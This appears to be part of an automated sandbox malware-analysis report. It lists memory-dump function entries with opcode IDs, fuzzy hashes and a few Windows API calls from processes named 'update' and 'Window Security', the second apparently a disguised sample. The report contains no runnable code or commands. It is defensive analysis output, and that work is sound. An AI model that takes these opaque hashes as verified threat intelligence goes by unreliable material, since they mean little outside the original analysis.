                                                    • Instruction Fuzzy Hash: 0551B634B5430A9BCB48EBB0F4B896E77B2BBD42447508D25D8269B3D8DF385C46CB81
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 07d09c50352647e50ef663b685e760f13ae90eaf0934b13b3f67c2ade2383287
                                                    • Instruction ID: 7b05c306994c50eb3624fee9672eb237902d2ae1c57dd27404f35fb8b2903caa
                                                    • Opcode Fuzzy Hash: 07d09c50352647e50ef663b685e760f13ae90eaf0934b13b3f67c2ade2383287
                                                    • Instruction Fuzzy Hash: F8414232A0022A8FCF05DFA4D9959ADF7B2FF89300B148565D40AAF385DB71AD06CB90
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4c9545f70ac2e7bde9e46ac1cda1503f0f657302a47728d54c8a024b3fdc387c
                                                    • Instruction ID: c6a70728afa6a1ed5a3cb6bcd73b39b5bbca24592866856f7212dcf014c996ac
                                                    • Opcode Fuzzy Hash: 4c9545f70ac2e7bde9e46ac1cda1503f0f657302a47728d54c8a024b3fdc387c
                                                    • Instruction Fuzzy Hash: A4511A74B402158FCB08DF69D9959AEBBF2FF89300B608539D90ADB354DB31AC42CB50
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 277dc7ef483d1877c16cc08e6b11b349669d4db2da3c0f337e461e1165e29cb3
                                                    • Instruction ID: 139de9deac609bcab375a61cffd3bc24080c02324ee32727f261fff77bcee187
                                                    • Opcode Fuzzy Hash: 277dc7ef483d1877c16cc08e6b11b349669d4db2da3c0f337e461e1165e29cb3
                                                    • Instruction Fuzzy Hash: DC51B734B5430A9BCB48EBB0F4B896E77B2BBD42447508D25D8269B3D8DF385C46CB81
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 71ac610d94ec1d019ec282e54fbfb33ed386b80532c5e13c3be2c6fed4c5933c
                                                    • Instruction ID: d997faf64165a38125df1cab6af2e63d37d7bd1cc8b5cc43b7022f603d356459
                                                    • Opcode Fuzzy Hash: 71ac610d94ec1d019ec282e54fbfb33ed386b80532c5e13c3be2c6fed4c5933c
                                                    • Instruction Fuzzy Hash: 00413C35B4021A8FCB44EB74D4A06AFB3B2FBD9254B508529C41ADB388DF759D078B92
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b135140a5d9e55a260978ec2f860a256f5971be87413b24cdd99bc91c3e39d2a
                                                    • Instruction ID: 12080454346527794a6c9b1bae4d92b19c6a3c29721ccc94a12b3f0aa7b7f5da
                                                    • Opcode Fuzzy Hash: b135140a5d9e55a260978ec2f860a256f5971be87413b24cdd99bc91c3e39d2a
                                                    • Instruction Fuzzy Hash: E651B834B5430A9BCB48EBB0F4B896E77B2BBD42447508D25D8269B3D8DF385C46CB81
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5e41810d798810e7ace9a9be8f3f44941cf9d606ae3162c89530eea0d2777d94
                                                    • Instruction ID: 2144f4a5c39cfe6f4391459ca1a2dbcf1012cccf09804d96891179843cd287f5
                                                    • Opcode Fuzzy Hash: 5e41810d798810e7ace9a9be8f3f44941cf9d606ae3162c89530eea0d2777d94
                                                    • Instruction Fuzzy Hash: FA41B734B5430A9BCB48EBB0F4B896E77B2BBD42447508D25D8269B3D8DF385C46CB81
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1cb93a4bf367685801d40d219363d9ea32466c2b0bcebb2368786a2ce1c8d242
                                                    • Instruction ID: c400a7d4b42e4c35b87863baa9a2306ca63f7ee73ac62e99de386f995d4e6d62
                                                    • Opcode Fuzzy Hash: 1cb93a4bf367685801d40d219363d9ea32466c2b0bcebb2368786a2ce1c8d242
                                                    • Instruction Fuzzy Hash: F3418B31B401158FCB49EB69D45966EBBF2FBCA300B908539D40ADB385DF709C42CB91
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7256114ba2de7bb18a1b18da451d1834978a61b8440c80538a2b05aa3e885d9b
                                                    • Instruction ID: 84416d11a557fbf0e15210da3a1361dfa71e77843abda7f57311a9537df3ba60
                                                    • Opcode Fuzzy Hash: 7256114ba2de7bb18a1b18da451d1834978a61b8440c80538a2b05aa3e885d9b
                                                    • Instruction Fuzzy Hash: 31418F71F002199FCB08DFB9C58466EBBFAFF89700F248969D449D7345DA349D418B90
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 868fa4cb9f9d310443cea8b70055751b34955a85133297a5edb9de9e5f3dfaa0
                                                    • Instruction ID: 73438a45d11816dbb4d5098bdc7e4d15e7d543a78acbe3111ef46c78f0afd847
                                                    • Opcode Fuzzy Hash: 868fa4cb9f9d310443cea8b70055751b34955a85133297a5edb9de9e5f3dfaa0
                                                    • Instruction Fuzzy Hash: F441B734B5430A9BCB48EBB0F4B896E77B2BBD42447508D25D826973D8DF385D46CB81
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d251057ddde97031e85b65396bd6b926cc17ed7668564836b9915bd97fdf643e
                                                    • Instruction ID: 861f5d6edce53f5e73148377bb84ff0585f11840f311d43bf1cb4c95869310b7
                                                    • Instruction ID: 12d5d7640e6bbd4b3ebc193a5fc4bd6d2f1de1cd53d7105f7480340ac9de28ee
                                                    • Opcode Fuzzy Hash: 995e30c84d3b056aea80ee9ccabccf51bd71b29cd126f5a139951fc18564c120
                                                    • Instruction Fuzzy Hash: D8212E31600229CFDB54EB64D9556AE7BF2BF8A304F100478D502AF7E4DB398905CB95
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 74434e91780eda75a25ab8415639230d7ac39e39cb4ce06bc0d2b2a7e80d3e23
                                                    • Instruction ID: 8776d7f593b7480c7aa78c9986ef62d98b893600aab7c37aa7f4b26121157175
                                                    • Opcode Fuzzy Hash: 74434e91780eda75a25ab8415639230d7ac39e39cb4ce06bc0d2b2a7e80d3e23
                                                    • Instruction Fuzzy Hash: 3F118F72F402258FCB049F6998586AEBBF6FB89311B404539E90AD7381DB718D51CB90
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 88ff4ad99f8b43320eee178fa138341989bece4c96e4bf965374fd6b360278f3
                                                    • Instruction ID: 682b8d06fd58ab40814b619b106e035025bc352c9d9bb2f3dfd8a165b609361c
                                                    • Opcode Fuzzy Hash: 88ff4ad99f8b43320eee178fa138341989bece4c96e4bf965374fd6b360278f3
                                                    • Instruction Fuzzy Hash: 49112C72701229CFDB14EB64C5656AE7BF2BF8A304F100468D902AF7E4DF758905CB96
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dba9f81c99a211b040acf76a1c6b9c853a70ad59db04c1eb82e72819f0e1ee0a
                                                    • Instruction ID: de7a5210cce6526e9e89ae35bee4385d417575fcc57ad775d1d56849928c57f5
                                                    • Opcode Fuzzy Hash: dba9f81c99a211b040acf76a1c6b9c853a70ad59db04c1eb82e72819f0e1ee0a
                                                    • Instruction Fuzzy Hash: 2311A731E5034A9FDB14CF65C84459EFBB6FF89700F548A29E401BB241EB70A9C5CB90
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 183173079c0d14a6a4c4d812dc7f3338e986e8d01cd1fd24fd7d74088eb1d387
                                                    • Instruction ID: 6d7beadbd1eb21d1128d757c14638966bdb913d63df7e9eb722b869850f650bf
                                                    • Opcode Fuzzy Hash: 183173079c0d14a6a4c4d812dc7f3338e986e8d01cd1fd24fd7d74088eb1d387
                                                    • Instruction Fuzzy Hash: BC118232B002259FDB50DE6CA8506EF77F5FB89214B204177C909D7289EB35DD128BD2
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a488ccd0322344eedead3bf4152c4159567875130db96cc9a877f7c22c1f7b1
                                                    • Instruction ID: 1ab57725b43d2fa8a4bdcffb88652e41f2e6db2257190791e4c38430bbcd358e
                                                    • Opcode Fuzzy Hash: 2a488ccd0322344eedead3bf4152c4159567875130db96cc9a877f7c22c1f7b1
                                                    • Instruction Fuzzy Hash: 8111A075A00216DFC754EF78D5549AA77EAFF89310710487AD805DB364EB38DC05CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9d05692a8511a960b6a7ce7b032e32790041b7f8cafb101931342ee32cbd2c1f
                                                    • Instruction ID: 68214665b08997f2578ed2a76ad0c4f05de5c6e00552c58e2bf9c5c20ce460b4
                                                    • Opcode Fuzzy Hash: 9d05692a8511a960b6a7ce7b032e32790041b7f8cafb101931342ee32cbd2c1f
                                                    • Instruction Fuzzy Hash: DF11C2B1A403009FDB049F59D880BAA7BA9FFC5710F508479E9499F2A6DB759C09CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 98e9363906ab0b0228c69c68b430b2341dd200d62ac002df079ae28b0ee8dae5
                                                    • Instruction ID: c0195c9073127dfa0e0daa0c658f5cbe4ed6022909dbfdbfb738fb12cfffe56c
                                                    • Opcode Fuzzy Hash: 98e9363906ab0b0228c69c68b430b2341dd200d62ac002df079ae28b0ee8dae5
                                                    • Instruction Fuzzy Hash: EE113A72601225CFDB28EB24C5696EE37B2BF89304B10046DD502AF7A5DB368C15CB95
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f8a8ecccc5ed56e23d1a015d006d68d80cebf4fe4e335d29ccd57debefba7589
                                                    • Instruction ID: a15dfbf9bcdfd6b935dc4b3e009fa38ee8f8e308f852b915abf689b44eed0ec4
                                                    • Opcode Fuzzy Hash: f8a8ecccc5ed56e23d1a015d006d68d80cebf4fe4e335d29ccd57debefba7589
                                                    • Instruction Fuzzy Hash: 2D11B734B8020A9BCB48EFB0F46896E73B2FB843447508D25D826977D8DF385D52CB81
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5832c2e8fa0542acc5570c69b0c9c2e7ec6ccfbffce69edb7812bb1dcb0ba525
                                                    • Instruction ID: be06f797195ddc6aa055111df3e292b7626863884b070083a535aa26a60d1ca3
                                                    • Opcode Fuzzy Hash: 5832c2e8fa0542acc5570c69b0c9c2e7ec6ccfbffce69edb7812bb1dcb0ba525
                                                    • Instruction Fuzzy Hash: 1D01F4333601200FDB04A6BEB85426EB3DAEBC8675B60853BE60EC3341DD71CC464791
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 655c20b01891d8e28e12e2d28732591d410a4a4c1c820b51867fe61742e9c58c
                                                    • Instruction ID: 1cfabe57a78c957921b7b951549fb8609ae502f736914d743266aa1d275aa3ba
                                                    • Opcode Fuzzy Hash: 655c20b01891d8e28e12e2d28732591d410a4a4c1c820b51867fe61742e9c58c
                                                    • Instruction Fuzzy Hash: 92118B74B0021ADFCB54EBB9D46452B7BE6BF8A200710487AD40ACB3A4EA31DC01CB91
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2ed55bf0cf0900108cb55334755733b0b67d5c7c4d713cfacf19e3fbfbda4e88
                                                    • Instruction ID: 8b02fb0da5e77145ff5ba10ab488f9afc891ed05cb431e9629b61ec16b8dd02f
                                                    • Opcode Fuzzy Hash: 2ed55bf0cf0900108cb55334755733b0b67d5c7c4d713cfacf19e3fbfbda4e88
                                                    • Instruction Fuzzy Hash: 42114274E00308EFCB06EFA4E6A465DBBBAEF84300F1085A9D80857369DB355E45DB55
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 34243c5502009b7b22420075ecab5b61fa70e2c36952308a73ae7e94b8e633c7
                                                    • Instruction ID: 73d6e2bfae27b89dfa45e89a4948eeef4c18e889d553cab325852dc2dde6a039
                                                    • Opcode Fuzzy Hash: 34243c5502009b7b22420075ecab5b61fa70e2c36952308a73ae7e94b8e633c7
                                                    • Instruction Fuzzy Hash: 5B01DB6640F75CCAC3636734D06C23ABD48FB53255B880995E5D25E2EFDD54850DC392
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6de811b17bb45791705e9d69ca830c2cdddc0e5d7357d1df733a7d9b4bc88071
                                                    • Instruction ID: cd5eaaf8ee277769edebd1444808685da511e5873e669651ad4b8b4e9e1e86fc
                                                    • Opcode Fuzzy Hash: 6de811b17bb45791705e9d69ca830c2cdddc0e5d7357d1df733a7d9b4bc88071
                                                    • Instruction Fuzzy Hash: 4811C834B8020A9BCB48EFB0F46896E77B2FB843447508C25D826977D4DF385D52CB81
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7bd14b6d054b91a94de638abc3d5dac98c13f91701dacc0c104a85ebcd128bd5
                                                    • Instruction ID: ec3f9d3e94aecfd15b17eabd10af3a268c4291aa9c01d4aad3feeff92d53ac85
                                                    • Opcode Fuzzy Hash: 7bd14b6d054b91a94de638abc3d5dac98c13f91701dacc0c104a85ebcd128bd5
                                                    • Instruction Fuzzy Hash: 110192B0B403008FDB08DF59D88475A7BA9FFC8700F508439D5089F399DB759805CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2b932e772417f35f50e982bfadce80a79236f37c656d02fdef05abbe2eb7f0dd
                                                    • Instruction ID: 3072c57b33886314f303f90dc24dad246488eb365705cf5666150cd6c8c17ab5
                                                    • Opcode Fuzzy Hash: 2b932e772417f35f50e982bfadce80a79236f37c656d02fdef05abbe2eb7f0dd
                                                    • Instruction Fuzzy Hash: 0F115E74E0030CEFCB05EFA5E66465DBBBAEF88300F208469D81863369DB345E45DB45
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 45fc214e74f07ef77f6cd000d417d083e4526e358600b752660c75c25422eaa5
                                                    • Instruction ID: 16d8b7d9a8eff63f10b444dffe5857ba5b074cdaceb65bd6fc288ac354f72f12
                                                    • Opcode Fuzzy Hash: 45fc214e74f07ef77f6cd000d417d083e4526e358600b752660c75c25422eaa5
                                                    • Instruction Fuzzy Hash: 6B016771E002199F8B54DFBDE8505DEBBF8FB4A3107108536D418E7244F73559558FA0
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 96fc630c27a81b809dc799f99b344555472b00b603b9ce542a8fc2da25c82925
                                                    • Instruction ID: d5c6b0357d81a438924c89451b119d962194ccc0b3052343b5df36a4638377d5
                                                    • Opcode Fuzzy Hash: 96fc630c27a81b809dc799f99b344555472b00b603b9ce542a8fc2da25c82925
                                                    • Instruction Fuzzy Hash: 60016DB1E042199F8B51DFA8A8D55EEBBF8FB49260B100039D805E7240E7355D05CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 75c70cb11790fc4ef9b68be9efdba568d8ece0803dc1db61ba739b9257117e1d
                                                    • Instruction ID: 85041676f861ec046d36571ef6dac46ffb9f92d1db08730d129947e4112f7f62
                                                    • Opcode Fuzzy Hash: 75c70cb11790fc4ef9b68be9efdba568d8ece0803dc1db61ba739b9257117e1d
                                                    • Instruction Fuzzy Hash: FD01A9B1E102298F8B50DF6D98815EFBBF8FB89310B044139D509F7205E770A905C7D1
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ebe0838717d480cca764553144d534681554876b9fa42c6c07e5bd059c06b40a
                                                    • Instruction ID: 58e1738e3ad0f48f2e0b07ed1ff748dc8e12cc2ad71f9f2ae130ece1e6aa6ac2
                                                    • Opcode Fuzzy Hash: ebe0838717d480cca764553144d534681554876b9fa42c6c07e5bd059c06b40a
                                                    • Instruction Fuzzy Hash: 9BF0AF72A002198F8B51EF6CE9919AE7BF9FBCA2107104129E509EB344E7319D05CBE0
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 59ad5d4b1841f452e327d7c4ed6a196a1948f42f173e37530b1d2f8988ac8f27
                                                    • Instruction ID: cbc9ff449d42cb785e2da398b4112c9268e81b3a681cd1e69d46e025fe614126
                                                    • Opcode Fuzzy Hash: 59ad5d4b1841f452e327d7c4ed6a196a1948f42f173e37530b1d2f8988ac8f27
                                                    • Instruction Fuzzy Hash: 5401DB31B0215A9FC710EF24E8605AD7BB5F745210B00016FDC19C7768FB309D00CB52
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a1eafa855d0258468a0defd223571b7c420b2a9559b391345747330fe69c69f
                                                    • Instruction ID: f855af03e0a9de2a31ecd65ee46ad58b8af8c75797526347626c25d7b9801e34
                                                    • Opcode Fuzzy Hash: 2a1eafa855d0258468a0defd223571b7c420b2a9559b391345747330fe69c69f
                                                    • Instruction Fuzzy Hash: F6F04471E0422E9F8B64DEA9A8805EF7BF8FB89720B000539D905E7240F73559458BA1
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 132d98fe17110acf65407a0115ca1f396accf2ada323bcd8da8ccf314d2e08cd
                                                    • Instruction ID: 571d679414caac1429ad6e698a8d0cccc2b4bc01d1ceb18e8159ea46fbfeacc2
                                                    • Opcode Fuzzy Hash: 132d98fe17110acf65407a0115ca1f396accf2ada323bcd8da8ccf314d2e08cd
                                                    • Instruction Fuzzy Hash: 49F0C271E403269F8B41DE6DA8405AF7BF9FBC6360710013AE908D7340D7355A15CBE1
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd

                                                    Execution Graph

                                                    Execution Coverage: 9.5%
                                                    Dynamic/Decrypted Code Coverage: 100%
                                                    Signature Coverage: 0%
                                                    Total number of Nodes: 30
                                                    Total number of Limit Nodes: 2

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2864892595.0000000006B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6b90000_Window Security.jbxd

                                                    Control-flow Graph


                                                    Control-flow Graph

                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 01593401
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2839872705.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1590000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 25b38d30bf630f223bd6ca359df8be955cacde264726a161539c19acb341d1ee
                                                    • Instruction ID: 8d9fe3c5b3f5d6d7f64275b1b6f1a864581cc3a49512987bd16511b12f8dd081
                                                    • Opcode Fuzzy Hash: 25b38d30bf630f223bd6ca359df8be955cacde264726a161539c19acb341d1ee
                                                    • Instruction Fuzzy Hash: 09411EB0C00619CBDF24DFA9C848B9EBBF1BF49304F20846AD508AB255DB756946CF92

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 01593401
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2839872705.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1590000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 6837132a223e094059817b7fbb5b6c1a6aecdb22351f23994a5b1fd390ecdd52
                                                    • Instruction ID: 289597846cf35e6e5cfcf6a94b652b43de343cf206605951ab503a9a1a6f9533
                                                    • Opcode Fuzzy Hash: 6837132a223e094059817b7fbb5b6c1a6aecdb22351f23994a5b1fd390ecdd52
                                                    • Instruction Fuzzy Hash: C7411EB4C00319CFDB25DFA9C948B8DBBF1BF48304F20846AD408AB255DB756946CF91

                                                    Control-flow Graph

                                                    APIs
                                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0159FDE5), ref: 0159FE68
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2839872705.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1590000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: DeleteFile
                                                    • String ID:
                                                    • API String ID: 4033686569-0
